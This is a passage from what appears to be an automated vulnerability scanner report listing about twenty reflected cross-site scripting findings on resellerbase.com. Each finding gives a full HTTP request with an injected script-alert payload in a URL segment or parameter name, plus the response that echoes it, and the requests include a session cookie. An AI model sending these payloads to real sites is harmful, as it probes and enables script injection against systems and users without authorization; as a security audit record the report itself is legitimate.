Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/6f8c64<script>alert(1)</script>94f2ee4ee41/themes/kosmos/ was not found on this server.</p>
...[SNIP]...

2.3487. http://www.resellerbase.com/detail/6/themes/kosmos/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/6/themes/kosmos/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 75070<script>alert(1)</script>ba6ff3c5621 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/6/themes75070<script>alert(1)</script>ba6ff3c5621/kosmos/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:03:31 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/6/themes75070<script>alert(1)</script>ba6ff3c5621/kosmos/ was not found on this server.</p>
...[SNIP]...

2.3488. http://www.resellerbase.com/detail/6/themes/kosmos/ [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/6/themes/kosmos/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload e461b<script>alert(1)</script>0c1b00f2892 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/6/themes/kosmose461b<script>alert(1)</script>0c1b00f2892/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:03:41 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/6/themes/kosmose461b<script>alert(1)</script>0c1b00f2892/ was not found on this server.</p>
...[SNIP]...

2.3489. http://www.resellerbase.com/detail/6/themes/kosmos/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/6/themes/kosmos/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 5aa98<script>alert(1)</script>5d08db7cd5e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/6/themes/kosmos/?5aa98<script>alert(1)</script>5d08db7cd5e=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:02:43 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/6/themes/kosmos/?5aa98<script>alert(1)</script>5d08db7cd5e=1 was not found on this server.</p>
...[SNIP]...

2.3490. http://www.resellerbase.com/detail/6/themes/kosmos/images/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/6/themes/kosmos/images/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload c5f37<script>alert(1)</script>e321d3fdee2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detailc5f37<script>alert(1)</script>e321d3fdee2/6/themes/kosmos/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:03:02 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detailc5f37<script>alert(1)</script>e321d3fdee2/6/themes/kosmos/images/ was not found on this server.</p>
...[SNIP]...

2.3491. http://www.resellerbase.com/detail/6/themes/kosmos/images/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/6/themes/kosmos/images/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 46483<script>alert(1)</script>a75bce33094 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/646483<script>alert(1)</script>a75bce33094/themes/kosmos/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:03:10 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/646483<script>alert(1)</script>a75bce33094/themes/kosmos/images/ was not found on this server.</p>
...[SNIP]...

2.3492. http://www.resellerbase.com/detail/6/themes/kosmos/images/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/6/themes/kosmos/images/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload ddaba<script>alert(1)</script>e6875236bb0 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/6/themesddaba<script>alert(1)</script>e6875236bb0/kosmos/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:03:20 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/6/themesddaba<script>alert(1)</script>e6875236bb0/kosmos/images/ was not found on this server.</p>
...[SNIP]...

2.3493. http://www.resellerbase.com/detail/6/themes/kosmos/images/ [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/6/themes/kosmos/images/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 13ab0<script>alert(1)</script>d94c6b5884f was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/6/themes/kosmos13ab0<script>alert(1)</script>d94c6b5884f/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:03:29 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/6/themes/kosmos13ab0<script>alert(1)</script>d94c6b5884f/images/ was not found on this server.</p>
...[SNIP]...

2.3494. http://www.resellerbase.com/detail/6/themes/kosmos/images/ [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/6/themes/kosmos/images/

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 708d3<script>alert(1)</script>36bbc4b1de1 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/6/themes/kosmos/images708d3<script>alert(1)</script>36bbc4b1de1/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:03:47 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/6/themes/kosmos/images708d3<script>alert(1)</script>36bbc4b1de1/ was not found on this server.</p>
...[SNIP]...

2.3495. http://www.resellerbase.com/detail/6/themes/kosmos/images/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/6/themes/kosmos/images/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 5ac81<script>alert(1)</script>e9dda098920 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/6/themes/kosmos/images/?5ac81<script>alert(1)</script>e9dda098920=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:02:45 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/6/themes/kosmos/images/?5ac81<script>alert(1)</script>e9dda098920=1 was not found on this server.</p>
...[SNIP]...

2.3496. http://www.resellerbase.com/detail/6/themes/kosmos/images/rating/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/6/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 79837<script>alert(1)</script>c1a5c6f1d91 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail79837<script>alert(1)</script>c1a5c6f1d91/6/themes/kosmos/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:03:03 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail79837<script>alert(1)</script>c1a5c6f1d91/6/themes/kosmos/images/rating/ was not found on this server.</p>
...[SNIP]...

2.3497. http://www.resellerbase.com/detail/6/themes/kosmos/images/rating/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/6/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 2caa8<script>alert(1)</script>6645676b720 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/62caa8<script>alert(1)</script>6645676b720/themes/kosmos/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:03:13 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/62caa8<script>alert(1)</script>6645676b720/themes/kosmos/images/rating/ was not found on this server.</p>
...[SNIP]...

2.3498. http://www.resellerbase.com/detail/6/themes/kosmos/images/rating/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/6/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 515c8<script>alert(1)</script>f31f3adb830 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/6/themes515c8<script>alert(1)</script>f31f3adb830/kosmos/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:03:24 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/6/themes515c8<script>alert(1)</script>f31f3adb830/kosmos/images/rating/ was not found on this server.</p>
...[SNIP]...

2.3499. http://www.resellerbase.com/detail/6/themes/kosmos/images/rating/ [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/6/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 7142a<script>alert(1)</script>a4f038f7db6 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/6/themes/kosmos7142a<script>alert(1)</script>a4f038f7db6/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:03:33 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/6/themes/kosmos7142a<script>alert(1)</script>a4f038f7db6/images/rating/ was not found on this server.</p>
...[SNIP]...

2.3500. http://www.resellerbase.com/detail/6/themes/kosmos/images/rating/ [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/6/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload b2a11<script>alert(1)</script>5ad1b9e8f0d was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/6/themes/kosmos/imagesb2a11<script>alert(1)</script>5ad1b9e8f0d/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:03:43 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/6/themes/kosmos/imagesb2a11<script>alert(1)</script>5ad1b9e8f0d/rating/ was not found on this server.</p>
...[SNIP]...

2.3501. http://www.resellerbase.com/detail/6/themes/kosmos/images/rating/ [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/6/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload bbaf9<script>alert(1)</script>91b5d4e03d5 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/6/themes/kosmos/images/ratingbbaf9<script>alert(1)</script>91b5d4e03d5/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:03:57 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/6/themes/kosmos/images/ratingbbaf9<script>alert(1)</script>91b5d4e03d5/ was not found on this server.</p>
...[SNIP]...

2.3502. http://www.resellerbase.com/detail/6/themes/kosmos/images/rating/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/6/themes/kosmos/images/rating/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 4cd96<script>alert(1)</script>e29d5c7e992 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/6/themes/kosmos/images/rating/?4cd96<script>alert(1)</script>e29d5c7e992=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:02:48 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/6/themes/kosmos/images/rating/?4cd96<script>alert(1)</script>e29d5c7e992=1 was not found on this server.</p>
...[SNIP]...

2.3503. http://www.resellerbase.com/detail/6/themes/kosmos/images/rating/4.gif [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/6/themes/kosmos/images/rating/4.gif

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 4ff08<script>alert(1)</script>82971ed67c8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail4ff08<script>alert(1)</script>82971ed67c8/6/themes/kosmos/images/rating/4.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:23:36 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail4ff08<script>alert(1)</script>82971ed67c8/6/themes/kosmos/images/rating/4.gif was not found on this server.</p>
...[SNIP]...

2.3504. http://www.resellerbase.com/detail/6/themes/kosmos/images/rating/4.gif [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/6/themes/kosmos/images/rating/4.gif

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 6975e<script>alert(1)</script>1cd16526d05 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/66975e<script>alert(1)</script>1cd16526d05/themes/kosmos/images/rating/4.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:23:52 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/66975e<script>alert(1)</script>1cd16526d05/themes/kosmos/images/rating/4.gif was not found on this server.</p>
...[SNIP]...

2.3505. http://www.resellerbase.com/detail/6/themes/kosmos/images/rating/4.gif [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/6/themes/kosmos/images/rating/4.gif

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 1812c<script>alert(1)</script>82f2a5f1cc4 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/6/themes1812c<script>alert(1)</script>82f2a5f1cc4/kosmos/images/rating/4.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:24:05 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/6/themes1812c<script>alert(1)</script>82f2a5f1cc4/kosmos/images/rating/4.gif was not found on this server.</p>
...[SNIP]...

2.3506. http://www.resellerbase.com/detail/6/themes/kosmos/images/rating/4.gif [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/6/themes/kosmos/images/rating/4.gif

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 51423<script>alert(1)</script>4870c7dcaf5 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

